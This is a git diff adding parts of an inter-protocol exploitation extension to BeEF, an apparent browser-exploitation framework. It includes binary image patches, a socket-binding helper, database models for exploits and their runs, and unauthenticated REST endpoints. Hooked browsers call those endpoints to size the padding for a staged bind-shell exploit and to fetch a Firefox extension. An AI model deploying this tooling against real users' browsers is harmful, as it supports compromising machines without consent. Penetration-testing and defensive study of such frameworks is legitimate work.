zcmV;Y0a*TtP)<h;3K|Lk000e1NJLTq002_}000aK0{{R3DYS7A0000PbVXQnQ*UN;
zcVTj606}DLVr3vnZDD6+Qe|Oed2z{QJOBUyGf+%aMgPyw|L^brpP&CAApdZ1|F5tA
zU||0c5dTn6|BsLVFfjk$-~YeA|A2u1KtTTh0RR90)W8}_0003BNkl<Zc-pj++p>co
z3`N65vAL1||JswNXglSho$1MgK(hBDFaq}bfd66k7?qFpIcoRNi9S8zD^cd*iG)m;
zBQD*G>JHXvamrK{)Ux=PF`cTUTC%CCRouD(Vl`~_LJSX}qPPZO7e6ysThw$rkYVG+
zvS)JSxf_zL`RsGQnc+b;m1Q+5A%0;>98Al0ohEIl;oRHm*1d`ReD>k#k&vQ?c*0~{
z22<+ZIa~G~x)m~_8Pf}^xW@Qq#{M@G+PF_fzps!btlBN36oQuDm>Fvm*KGA-vIjvT
zvIGXnfWqKQBk-*~6N2VT_T2!^qEAnc>mtDrsZalTE~1ZLzoW$T#XI^FU;y2+Hd6=n
RxHJF&002ovPDHLkV1l+G$)*4R

literal 0
HcmV?d00001

diff --git a/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png b/extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png
new file mode 100644
index 0000000000000000000000000000000000000000..d1475a33b68cf6ab4ff2a6f559d9ac1bca708b91
GIT binary patch
literal 1067
zcmeAS@N?(olHy`uVBq!ia0vp^Dj>|k3?#4J%UA`ZBuiW)N`mv#O3D+9QW+dm@{>{(
zJaZG%Q-e|yQz{EjrrIztFy;mLgt)$Z`SSYp>yI8idiLzul`B^+T)1%j`0;PwzWw_3
z>+IRHr%s*9%F6ol=g+NMxBmbCfBW|BfB*iydGqG`_wPrK9{u_A=ik47&z(DW<j9f#
z3=Ahvp8W9P!!K*=-@kufzI^%P$B!pYocOwRYe`8-QBhHOd3jS))7!Uij~zR<Z{NPh
zj~^El6#THX{Ap!%`0(MSOP4NOxUj3MYw_a62M!$AvSrJgHEU{WYI=Kn4<0=D{Q2`a
zbLM<CGb=7Ge)a0rs#UA*-o3kh`}S?ywtX`<pEz-1PEO8~Cr|e7-TU$3!w&}zba!``
zm6d(jvgP^m<ttaN{PE+*`}OO;TUb<9R`&GtELpN->eQ(%EiL=^?=LMaU9e!m)~#FL
z_VzY5HZEVj{L7IepFe+Iv0}yJ#f$&w>fXC|uerH-_3G6R7cT7U>-)HI<1cOPhK7dh
z?Cg(?jmwrTtFEs8eE9Iol`H4YoqOlbotGz1K3THl(4j-09zCkBuivp_$Nl^F&!0d4
z<;xdf0ABwsoDYnis*)hTU?6v30K*IW7iz%xKkMn@7*cWT$(8W%#SS724^DEqb?k0X
zN#x<;R8TS8D_wnk>-E^X_p0?@?7yGc^5kIgx4Zc>c7Esk-g=l}$3OlDW+s`_*Zb?N
zzI`_3oKZ!Y@wC!Qe^z`opZZ4W`n31F9$R)Q@4k}#>*bX2)JQ)Sp_EfE4slD}{M0R$
z`-xBPO`l&6o0>$>n`?Z2g~10ikGi`(D%`@;5xkcBt<;LSUM5nq-QRi)Rop|DE@sTv
zu5Pv2x9jAqY3%2`+a@a6tzRDW`u6RYCBLpKZ&||2eBZF=lBLFKuEqNUr|`zM@7lM}
z{&Hz;SAfWNo}5gvfXme?2Mkox_TNlUy)CzB*=rStIdv<p@8A4(;Tx_KXYVI|iuY)+
zsGWV@p6A>1;sp=w|9ii^ug=(}`PAH@*m2T3A#Z=rhDj>Ae<x_{`M8{Oo{akpNsfm;
zDolmHw1lkgG0saZk}*H|)yK#&H%czTBI;S?{o|7#RTn(`ecJU)(`r9MO%+y0k02)w
zao6Qt{ay#(%~+(-XPm^4`uJJ+ZU_F@gPA&f>}MX@b<da4wb+-ZTK;3xvQ@K|t;}#`
zj^DcTaLiHO^A%U;-2Nl``n#Q2_4b{~^Z06lve%uM*Ji7AzWd#+wLcR72q!RDO62~C
Tisdu|CNBn0S3j3^P6<r_c$k00

literal 0
HcmV?d00001

diff --git a/extensions/ipec/junk_calculator.rb b/extensions/ipec/junk_calculator.rb
new file mode 100644
index 000000000..718e40de2
--- /dev/null
+++ b/extensions/ipec/junk_calculator.rb
@@ -0,0 +1,40 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Extension
+    module Ipec
+      class JunkCalculator
+        include Singleton
+
+        def initialize
+           @binded_sockets = {}
+           @host = BeEF::Core::Configuration.instance.get('beef.http.host')
+        end
+
+        def bind_junk_calculator(name)
+          port = 2000
+          #todo add binded ports to @binded_sockets. Increase +1 port number if already binded
+          #if @binded_sockets[port] != nil
+          #else
+          #end
+          BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket(name, @host, port)
+          @binded_sockets[name] = port
+
+        end
+      end
+    end
+  end
+end
diff --git a/extensions/ipec/models/ipec_exploits.rb b/extensions/ipec/models/ipec_exploits.rb
new file mode 100644
index 000000000..789fdcf36
--- /dev/null
+++ b/extensions/ipec/models/ipec_exploits.rb
@@ -0,0 +1,37 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class IpecExploits
+
+        include DataMapper::Resource
+        #todo: use this table when we'll have a bigger IPEC exploits choice
+        storage_names[:default] = 'extension_ipec_exploits'
+
+        property :id, Serial
+
+        property :name, Text, :lazy => false
+        property :protocol, String, :lazy => false
+        property :os, String, :lazy => false
+
+        has n, :extension_ipec_exploits_run, 'IpecExploitsRun'
+
+      end
+
+    end
+  end
+end
diff --git a/extensions/ipec/models/ipec_exploits_run.rb b/extensions/ipec/models/ipec_exploits_run.rb
new file mode 100644
index 000000000..24ebcaa5b
--- /dev/null
+++ b/extensions/ipec/models/ipec_exploits_run.rb
@@ -0,0 +1,36 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+      class IpecExploitsRun
+
+        include DataMapper::Resource
+        #todo: use this table when we'll have a bigger IPEC exploits choice
+        storage_names[:default] = 'extension_ipec_exploits_run'
+
+        property :id, Serial
+        property :launched, Boolean, :lazy => false
+        property :http_headers, Text, :lazy => false
+        property :junk_size, String, :length => 3, :lazy => false
+
+        belongs_to :ipec_exploits
+
+      end
+
+    end
+  end
+end
diff --git a/extensions/ipec/rest/ipec.rb b/extensions/ipec/rest/ipec.rb
new file mode 100644
index 000000000..00b3eff9a
--- /dev/null
+++ b/extensions/ipec/rest/ipec.rb
@@ -0,0 +1,88 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Extension
+    module Ipec
+      class IpecRest < BeEF::Core::Router::Router
+
+        before do
+          # NOTE: the method exposed by this class are NOT-AUTHENTICATED.
+          # They need to be called remotely from a hooked browser.
+
+          #error 401 unless params[:token] == config.get('beef.api_token')
+          #halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        # Determine the exact size of the cross-domain request HTTP headers.
+        # Needed to calculate junk properly and prevent errors.
+        # See modules/exploits/beefbind/beef_bind_staged_deploy/command.js for more info.
+        # todo: the core of this method should be moved to ../junk_calculator.rb
+        get '/junk/:name' do
+           socket_name = params[:name]
+           halt 401 if not BeEF::Filters.alphanums_only?(socket_name)
+           socket_data = BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.get_socket_data(socket_name)
+           halt 404 if socket_data == nil
+
+           if socket_data.include?("\r\n\r\n")
+              result = Hash.new
+
+              headers = socket_data.split("\r\n\r\n").first
+              BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket(socket_name)
+              print_info "[IPEC] Cross-domain XmlHttpRequest headers size - received from bind socket [#{socket_name}]: #{headers.size + 4} bytes."
+              # CRLF -> 4 bytes
+              result['size'] = headers.size + 4
+
+              headers.split("\r\n").each do |line|
+                if line.include?("Host")
+                  result['host'] = line.size + 2
+                end
+                if line.include?("Content-Type")
+                  result['contenttype'] = line.size + 2
+                end
+                if line.include?("Referer")
+                  result['referer'] = line.size + 2
+                end
+              end
+              result.to_json
+           else
+             print_error "[IPEC] Looks like there is no CRLF in the data received!"
+             halt 404
+           end
+        end
+
+
+        # The original Firefox Extension sources are in extensions/ipec/files/LinkTargetFinder dir.
+        # If you want to modify the pref.js file, do the following to re-pack the extension:
+        # $cd firefox_extension_directory
+        # $zip -r ../result-name.xpi *
+        get '/ff_extension' do
+          response['Content-Type'] = "application/x-xpinstall"
+          ff_extension = "#{File.expand_path('../../../ipec/files', __FILE__)}/LinkTargetFinder.xpi"
+          print_info "[IPEC] Serving Firefox Extension: #{ff_extension}"
+          send_file "#{ff_extension}",
+                    :type => 'application/x-xpinstall',
+                    :disposition => 'inline'
+        end
+
+      end
+    end
+  end
+end
\ No newline at end of file